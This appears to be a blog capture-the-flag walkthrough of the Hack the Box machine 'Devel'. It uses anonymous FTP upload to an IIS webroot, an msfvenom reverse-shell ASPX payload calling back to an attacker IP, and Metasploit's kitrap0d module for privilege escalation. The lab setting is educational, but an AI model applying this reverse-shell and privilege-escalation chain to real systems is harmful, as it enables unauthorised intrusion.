tsustyle

Red Team Aspirant

Devel

less than 1 minute read

img

Port Scanning and General Enumeration (Nmap)

Initial scan shows ports 21 (FTP) and 80 (HTTP) open.

img

The target scan shows us that Anonymous FTP login is allowed and it looks like the webroot.

Logging in to FTP with the creds anonymous:anonymous we can put a file and see if we can access it from the browser. I wrote a simple htm file that says nice.

img

Access (FTP, metasploit, msfvenom)

Things we know:

  • We can access a file that we place on the FTP server
  • We’re working with Microsoft IIS so we’ll probably need an asp or aspx file

Let’s craft some shellcode using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f aspx > shell.aspx

Set up a listener in metasploit and access our shell in the browser

http://10.10.10.5/shell.aspx

and…

img

Privesc (metasploit, ms10-015)

Well, we’re on the box but as a low priv account. Let’s change that. Background the shell (bg) and:

use post/multi/recon/local_exploit_suggester

img

Looks like there’s a few we can try. Let’s try kitrap0d

use exploit/windows/local/ms10_015_kitrap0d

Make sure your settings are correct and fire it off.

img

img

That’s a better account! Capture the flags

img

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root